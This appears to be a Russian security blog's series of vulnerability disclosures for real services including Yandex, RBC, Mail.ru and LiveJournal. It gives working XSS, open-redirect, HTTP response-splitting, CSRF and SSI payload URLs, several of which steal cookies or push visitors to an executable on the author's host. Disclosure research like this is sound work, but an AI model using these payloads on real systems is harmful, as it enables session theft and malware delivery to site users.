Проще говоря уязвимость представляет из себя XSS-атаку выполняемую через распространенную технику сбора статистики показов и переходов для flash-баннеров.

Общепринятым для подобных систем является использование совершенно примитивной конструкции, причем (в том числе широкоизвестные рекламные агентства, но они нам в данном контексте неинтересны) её упоминают в требованиях к баннерам. Вот эта конструкция.

on(release) {
getURL(SOME_GET_PARAM,”_blank”);
}

Конструкция абсолютно безграмотна и небезопасна, однако, как я уже говорил распространена повсеместно.

Приведу примеры в качестве ссылок, а в конце приводится работающий пример получения персональных данных с сервиса.

Примеры для браузеров на движке Gecko: линейка Mozilla, линейка Mozilla Firefox, линейка Netscape (Browser, Navigator). Flash выше 9 версии, однако должен работать и на более ранних.

Яндекс - http://yabs.yandex.ru/resou … rfuVLA.swf?link1=javascript:alert(document.cookie)

РБК - http://pics.rbc.ru/7e1/91 … 90.swf?link1=javascript:alert(document.cookie)

Mail.ru - http://r1.mail.ru/b6108418.swf?rb_link=javascript:alert(document.cookie)

Итак, работающий пример. Пример, удобнее всего привести используя баннер из сети Яндекса. На странице будет отображен логин на Яндексе и количество новых писем в почтовом ящике. Предварительно необходимо авторизоваться на Яндексе.

Персональные данные отобразятся в браузере и никуда передаваться не будут

Update: Яндекс исправил уязвимость на уровне сервера.

Livejournal.com  

Приложение: /editjournal.bml, /update.bml

Пример приведу на сей раз на скриншоте

Сразу оговорюсь, что указанная версия по сообщениям самого браузера является актуальной и обновлений для неё нет. Поэтому, как минимум для неё, информация актуальна. 

Описание: Браузер данной версии позволяет выполнять следующую операцию.

window.self = window.top;

В итоге это может привести к подделке структуры окон при использовании фреймов. Т.е. используя тот факт что свойство window.self работает не только как getter, но и как setter мы можем сделать, например, iframe главным окном и выполнить его содержимое в контексте того, что он является top-окном. В некоторых случаях это чрезвычайно критично.

Firefox более ранних версий, а также все версии Opera, Internet Explorer подобного не поддерживают и сообщают о соотвествующем исключении при выполнении данного действия.

Пример - http://fuzzing.ru/blog/files/ff.iframe/ciframe.html

• Тип уязвимости: Межсайтовое выполнение сценариев (Persistent Cross Site Scripting). Недостаточная фильтрация содержимого.
  Приложение: Формы обработки записей и комментариев, как правило.

Ввиду чрезвычайно высокого масштаба данной уязвимости и очень опасных последствий её эксплуатации названия конкретных сервисов и конкретные способы эксплуатации я опускаю. Упомяну лишь, что в контексте блогхостинга это такие вещи как добавление посетителю в друзья произвольного пользователя, распространение зловредного ПО посетителям как блогов злоумышленников так и блогов популярных пользователей. Варианты и детали реализации способов эксплуатации могут быть различными и зависеть от особенностей конкретной системы.

Причины возникновения: Стандарт W3C предусматривает (и что самое удивительное поддерживают все основные браузеры) поддержку загрузки в элементе <OBJECT> содержимого очень разных типов, в том числе, таких в которых модулем обработки содержимого будет не специальный плагин, а базовые модули браузера.

К примеру, в данном элементе возможна загрузка и полноценный рендеринг содержимого с типом text/html.

<object height="0" width="0" type="text/html" data="http://fuzzing.ru/blog/"></object>

Информация приведенная в данном сообщении опубликована в исследовательских целях и преследует только одну итоговую цель - массовое исправление данной проблемы вендорами. Автор не несет ответственности за использование данной информацции в корыстных целях третьими лицами.

Вендоры за деталями могут обращаться по почте site@fuzzing.ru. К сожалению, уязвимых систем крайне много.

Берем первый попав�?ийся мне вариант, где файл отдает некий скрипт (прямой редирект на файл вроде исправили).

http://www.rbc.ru/bredir/?code=!%66%72%61%74%72%69%61%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%41%75%64%69%6F%2F%69%6E%64%65%78%2E%63%67%69%3F%73%6F%6E%67%3D%33%34%32%32%34%26%77%61%76%3D%31

http://banner.rbc.ru/banredir.cgi?code=!%66%72%61%74%72%69%61%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%41%75%64%69%6F%2F%69%6E%64%65%78%2E%63%67%69%3F%73%6F%6E%67%3D%33%34%32%32%34%26%77%61%76%3D%31

• Тип уязвимости: Переадресация URL.
  Приложение: http://www.rbc.ru/bredir/, http://banner.rbc.ru/banredir.cgi, http://www.rbc.ru/3e/9jjjgygaf/click
  GET-переменные: code

Примеры:

http://www.rbc.ru/bredir/?code=!%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65

http://banner.rbc.ru/banredir.cgi?code=!%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65

http://www.rbc.ru/3e/9jjjgygaf/click?code=!%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65

• Тип уязвимости: �?ндексирование директорий (Directory Indexing), как следствие -> Раскрытие исходного кода (Source code disclosure)

 Путь: http://banner.rbc.ru/banredir.cgi~

Комментарий: Часть кода работает именно так как описано в скрипте, однако есть все же подозрение, что он немного неактуальный. Судя по коду, очевидно, есть скрытое внедрение  SQL-операторов (Blind SQL-injection) ну и много другой полезной информации.

• Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
  Приложение: /
  GET-переменные: нет

Примечание: Уязвимость вызвана отсутствием фильтрации (или кодирования) исходного URL. Работает только во всех версиях Internet Explorer.

Возможные области применения (приведены простые примеры):

• Распространение вредоносного ПО - http://top.rbc.ru/incidents/22/10/2008/254898.shtml?fuzzing.ru=">test</a><script>document.location.replace(’http://fuzzing.ru/%62%6C%6F%67/%66%69%6C%65%73/FirefoxSetup.exe’);</script>
• Подмена содержимого страницы - http://top.rbc.ru/incidents/22/10/2008/254898.shtml?fuzzing.ru=">test</a><script>document.body.innerHTML=’<h1>Fuzzing.ru’</script>

 Приведенные примеры очень грубые. Без сомнений можно полагать, что качественная эксплуатация данных уязвимостей является делом техники.

• Тип уязвимости: Переадресация URL.
  Приложение: http://redir.rbc.ru/cgi-bin/redirect.cgi
  GET-переменные: нет

Возможные области применения (приведены простые примеры):

• Распространение вредоносного ПО - http://redir.rbc.ru/cgi-bin/redirect.cgi?http://%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65

Ну и напоследок, не очень практичная, но тем не менее полноценная…

• Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS) - DOM based. Недостаточная фильтрация содержимого переменной.
  Приложение: /
  GET-переменные: нет

Причины те же что и у описанной вы�?е XSS-уязвимости, но немного другой механизм срабатывания.

Пример: http://top.rbc.ru/incidents/22/10/2008/254898.shtml?’);alert(document.cookie);encodeURIComponent(’

Механизм срабатывания ограничен событием в которое упаковано внедренное содержимое (onclick по ссылке добавления в закладки текущей статьи), либо событием которое можно добавить элементу при внедрении. Однако элемент <a> событий которые можно создать без действий пользователя (к примеру, onload, onerrror) не имеет. Поэтому для просмотра результата надо кликнуть по ссылке добавления “в мемориз”.

• http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3E%3C%2F%62%6F%64%79%3E
• http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65%27%3E%3C%2F%62%6F%64%79%3E
• http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%27%72%65%66%72%65%73%68%27%20%63%6F%6E%74%65%6E%74%3D%27%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65%27%3E%3C%2F%6D%65%74%61%3E

По другим примерам аналог находится чуть более сложно.

• Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
  Приложение: /suggest-ya.cgi
  GET-переменные: part

Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=<script>alert(document.cookie)</script>

• Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)
  Приложение: /suggest-ya.cgi
  GET-переменные: ct

Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru (устанавливает cookie от имени сервера)

Простые примеры применения, не говоря уже о сложных вариантах.

• Универсальный редиректор - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru

• �?спользование уязвимостей других приложений или распостранение вирусов (подмена content-type)

Можно предложить, к примеру, скачать с Яндекса великолепную программу Firefox с поиском Яндекса

http://suggest.yandex.ru/suggest-ya.cgi?ct=application/x-msdos-program%0d%0aLocation:%20http://fuzzing.ru/blog/files/FirefoxSetup.exe%0d%0a%0d%0a&part=fuzzing.ru

�?ли любое другое приложение или мультимедиа-файл. К примеру.

http://suggest.yandex.ru/suggest-ya.cgi?ct=audio/mp3%0d%0aLocation:%20http://fuzzing.ru/blog/files/somedata.mp3%0d%0a%0d%0a&part=fuzzing.ru

• Подмена содержимого страницы - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html;charset=utf-8%0d%0a%0d%0a%D0%91%D0%BB%D0%BE%D0%B3%20fuzzing.ru<script>//&part=fuzzing.ru

Краткое содержание книги “AJAX Security” (главы), книга “Fuzzing: Brute Force Vulnerability Discovery” описывалась уже ранее в анонсе

• Introduction to Ajax Security
• The Heist
• Web Attacks
• Ajax Attack Surface
• Ajax Code Complexity
• Transparency in Ajax Applications
• Hijacking Ajax Applications
• Attacking Client-Side Storage
• Offline Ajax Applications
• Request Origin Issues
• Web Mashups and Aggregators
• Attacking the Presentation Layer
• JavaScript Worms
• Testing Ajax Applications
• Analysis of Ajax Frameworks

  Скачать книги можно здесь (PDF):

 AJAX Security,  Fuzzing: Brute Force Vulnerability Discovery.

Тип уязвимости: Межсайтовое выполнение запросов (Cross-site request forgery, CSRF). Недостаточная фильтрация содержимого.
Приложение: Адаптированный TinyMCE
Вредоносный код:  <img src=”some_GET_request”/>

  mail.ru

Тип уязвимости: Межсайтовое выполнение запросов (Cross-site request forgery, CSRF). Недостаточная фильтрация содержимого.
Приложение: Собственный редактор.
Вредоносный код:  <img src=”some_GET_request”/> 
 

Пример использования: При редактировании письма необходимо вставить строку <img src=”some_GET_request”/> в режиме “простой текст” и выполнить переключение в режим “с оформлением”, далее письмо можно смело отправлять и смотреть…

• Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
  Приложение: Поисковые формы на домене .yandex.ru
  GET-переменные: text

Примеры: частный случай на проекте Яндекс-Маркет.

http://market.yandex.ru/search.xml?text=%5C'%3Balert(document.cookie)%3B%2F%2F
�? т.д. Варианты всевозможные.

Примечание: Необходимо учитывать различия в обработке спецсимволов функциями escape(), encodeURI(), и encodeURIComponent(). Также как и не стоит пренебрегать обязательной фильтрацией содержимого на стороне сервера и полагаться на ненадежную фильтрацию на стороне клиента.

Update: Так исправлять нельзя! Привет разработчикам - http://market.yandex.ru/search.xml?cvredirect=1&text=';alert(document.cookie);//  (document.forms[’login’].retpath.value )

   Множественные XSS-уязвимости.

• Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
  Приложение: /circles/, /circles/{extention}/all/, /circles/{extention}/, /circles/{extention}/all/cloud/, где {extention} - university,interest,company,private,school,link,book,city
  GET-переменные: type, viewmode

Примеры:

http://moikrug.ru/circles/private/all/cloud/?keywords=test&viewmode="><script>alert(document.cookie)</script> 
http://moikrug.ru/circles/company/?keywords=test&type="><script>alert(document.cookie)</script>

• Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
  Приложение: /cur/cgi-bin/templater.cgi
  GET-переменные: ticker_to_name, ticker_from, ticker_to, sum, course

Примеры:

?cfg=converter&ticker_to_name=<script>alert(document.cookie)</script>
�? т.д. Варианты всевозможные.

• Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
  Приложение: /fnews.demo
  GET-переменные: ticker_to_name, ticker_from, ticker_to, sum, course

Примеры:

/?"onmouseover="alert(document.cookie) - Работает в IE.

• Тип уязвимости:  Раскрытие исходного кода (Source code disclosure) ->> Внедрение  серверных рас�?ирений (SSI Injection)
  Приложение: /conference/archive.shtml~

Уязвимый блок кода: 

<!–#if expr=”$QUERY_STRING” –>

 <!–#include virtual=”arc/$QUERY_STRING.shtml” –>

<!–#else –>

<!–#endif –>

Примечание: Необходимо быть очень аккуратным при редактировании кода на боевом сервере. :)

• Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
  Приложение: /my-card.xml

 Примеры:

/my-card.xml?hash=some_hash",eval(alert(document.cookie)),"

Чем опасно? Читаем здесь - http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.rus.doc

�?так, продолжаем серию публикаций об уязвимостях в проектах SUP Fabrik.   

• Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)
  Приложение: /click, параметр uri

Примеры:

- /click?uri=%0d%0aSet-Cookie:mysite=fuzzing.ru%0a%0d%0a%0dBodyContent
- /click?uri=%0aSet-Cookie:mysite=fuzzing.ru%0a%0d%0a%0dBodyContent

Чем опасно? Читаем здесь - http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.rus.doc

• Тип уязвимости: Доступен метод TRACE
  Приложение: Nginx, Apache

Подсказка: Метод доступен на backend’е. Начиная с версии 0.5.17 nginx на TRACE возвращает 405, либо необходимо закрывать на Apache.

Чем опасно? - http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf

 На днях будет подробное продолжение…